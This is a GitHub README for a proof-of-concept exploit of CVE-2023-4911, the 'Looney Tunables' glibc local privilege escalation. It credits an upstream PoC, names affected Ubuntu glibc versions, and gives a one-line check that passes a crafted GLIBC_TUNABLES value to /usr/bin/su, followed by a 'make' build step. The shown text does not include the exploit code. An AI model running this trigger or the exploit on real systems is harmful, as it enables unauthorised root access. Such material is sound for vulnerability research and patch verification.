Skip to content

Latest commit

 

History

History
19 lines (15 loc) · 735 Bytes

README.md

File metadata and controls

19 lines (15 loc) · 735 Bytes

CVE-2023-4911

This is a PoC (Proof Of Concept) for the Looney Tunables Linux Privilege Escalation vulnerability. This is based on this PoC. Great thanks to leesh3288. Here you can find a very detailed writeup, and here you can see a very cool video by IppSec.

Usage

Check if it's vulnerable

env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help

It is worth saying that vulnerable glibc versions are, including this one, from 2.35-0ubuntu3.3 and below.

Run the exploit

$ make